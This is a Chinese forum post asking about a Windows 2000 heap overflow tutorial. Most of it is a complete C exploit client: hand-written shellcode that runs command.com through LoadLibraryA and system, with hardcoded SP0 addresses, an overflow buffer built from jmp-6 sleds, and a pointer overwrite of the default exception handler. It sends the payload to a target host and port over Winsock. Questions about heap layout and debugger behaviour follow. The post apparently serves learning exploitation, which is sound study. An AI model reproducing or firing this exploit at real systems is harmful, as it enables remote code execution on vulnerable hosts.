看了isno写的《Windows下的HEAP溢出及其利用 》一文，虽然原理上能理解，但是还是有些疑惑，请各位朋友指点一下，原文地址：
  http://elfhack.whitecell.org/chinesedocs/win_heap1.txt
    以下是我在它的基础上修改的溢出代码，其实就是改了一下shellcode罢了，如下：

#include <stdio.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib, "ws2_32")    //原文中少了这句，不知道是故意还是... ：)unsigned char shellcode[] =
//放上16字节的90说是为了跳到shellcode中
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
//以下shellcode将开启一个cmd.
"\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
"\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\xF8\x52\xC6\x45\xF9\x54\xC6\x45\xFA\x2E\xC6"
"\x45\xFB\x44\xC6\x45\xFC\x4C\xC6\x45\xFD\x4C\xBA"
"\x23\x80\xE7\x77"  //2000 sp0上LoadLibraryA地址:0x77E78023
"\x52\x8D\x45\xF4\x50"
"\xFF\x55\xF0"
"\x55\x8B\xEC\x83\xEC\x2C\xB8\x63\x6F\x6D\x6D\x89\x45\xF4\xB8\x61\x6E\x64\x2E"
"\x89\x45\xF8\xB8\x63\x6F\x6D\x22\x89\x45\xFC\x33\xD2\x88\x55\xFF\x8D\x45\xF4"
"\x50\xB8"
"\xAD\xAA\x01\x78"  //2000 sp0上system地址:0x7801AAAD
"\xFF\xD0";
int main(int argc, char *argv[])
{ 
WSADATA      wsd;
SOCKET        sClient;
int          ret, i;
struct sockaddr_in server;
struct hostent    *host = NULL;

char buff[4096] = {0};

if(argc != 3)
{
  printf("usage: %s target port\n", argv[0]);
  exit(1);
}
if (WSAStartup(MAKEWORD(2,2), &wsd) != 0)
{
  printf("Failed to load Winsock library!\n");
  return 1;
}

sClient = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sClient == INVALID_SOCKET)
{
  printf("socket() failed: %d\n", WSAGetLastError());
  return 1;
}
server.sin_family = AF_INET;
server.sin_port = htons((u_short)atoi(argv[2]));
server.sin_addr.s_addr = inet_addr(argv[1]);
if (server.sin_addr.s_addr == INADDR_NONE)
{
  host = gethostbyname(argv[1]);
  if (host == NULL)
  {
  printf("Unable to resolve server: %s\n", argv[1]);
  return 1;
  }
  CopyMemory(&server.sin_addr, host->h_addr_list[0],
  host->h_length);
}
//连接到目标主机的1500端口
if (connect(sClient, (struct sockaddr *)&server,
  sizeof(server)) == SOCKET_ERROR)
{
  printf("connect() failed: %d\n", WSAGetLastError());
  return 1;
}

//下面开始构造溢出串
for(i=0;i<sizeof(buff);)
{
  buff[i++] = 0xeb;
  buff[i++] = 0x06;
}
//先把前面放上大量的jmp 6指令（0xeb,0x06）作为NOP
*(unsigned int *)&buff[32+8] = 0x0012f5bf;        //shellcode地址，但是[color=#ff0000]为什么是0x0012f5bf ？[/color]
*(unsigned int *)&buff[32+8+4] = 0x77ec044c; //windows2000 sp0上的默认异常处理地址
//在对应的位置放上要改写的内存地址和shellcode地址，
//这里用的shellcode地址是放在漏洞程序中的char buff[4096]里面的，
//这个是堆栈中的缓冲区地址，在不同的系统中可能略有不同
//把shellcode放在最后面
memcpy(&buff[sizeof(buff)-strlen(shellcode)-1],shellcode,strlen(shellcode));

/*
整个构造好的溢出串如下：
+---------------------------------------------------------------------------------------------------------------+
|jmp 6 jmp 6...| 0x0012f5bf | 0x77ebf44c | jmp 6 jmp 6...jmp 6 jmp 6|      shellcode    |
+---------------------------------------------------------------------------------------------------------------+
|    40 bytes    |    4 bytes    |    4 bytes    |                                        |shellcode的长度|
*/
//shellcode的前面要放上几个0x90，以便最后一个jmp 6可以跳到其中
buff[sizeof(buff)-1] = 0;

i = 4096;
//把溢出串发送过去
ret = send(sClient, buff, i, 0);
closesocket(sClient);
WSACleanup();

return 0;
}
疑惑1：
如果直接开两个CMD，一个运行服务端，一个运行溢出程序，就可以溢出成功，但是如果用OllyDbg加载服务端，再开一个CMD运行溢出程序，在OllyDbg中跟踪就会发现溢出失败。如下：

mov    [ecx], eax        ;这个时候eax=06EB06EB，本来应该为0x0012f5bf
mov    [eax+4], ecx    ;ECX=06EB06EB ，本来应该为0x77ec044c

我本来是打算用ollyDbg一路跟踪服务端，看看整个溢出过程的。

疑惑2：
文中提到第一次分配后：
+------------------------------------------------------+
|      buf1        |    8 byte  |  4 byte  |  4 byte  |
+------------------------------------------------------+
|      用户内存      |  管理结构  |  两个指针  |

但是有的资料说堆的结构是先8字节管理结构，后面才是用户内存。如下：

第一次分配后：
+---------------------------------------------------------+
|      8 byte      |        buf1          |4 byte | 4 byte|
+---------------------------------------------------------+
|      管理结构 |      用户内存    |    两个指针  |
而据我在ollyDbg中跟踪的结果是，buf1和buf2之间有24字节的距离。

疑惑3：
buff中为什么要用jmp 6来跳？照理应该是jmp 4这样4字节4字节的跳啊。

疑惑4：
shellcode前为什么要加16字节的90，这和jmp 6怎么刚好吻合？

以下疑惑谁能帮忙解释下？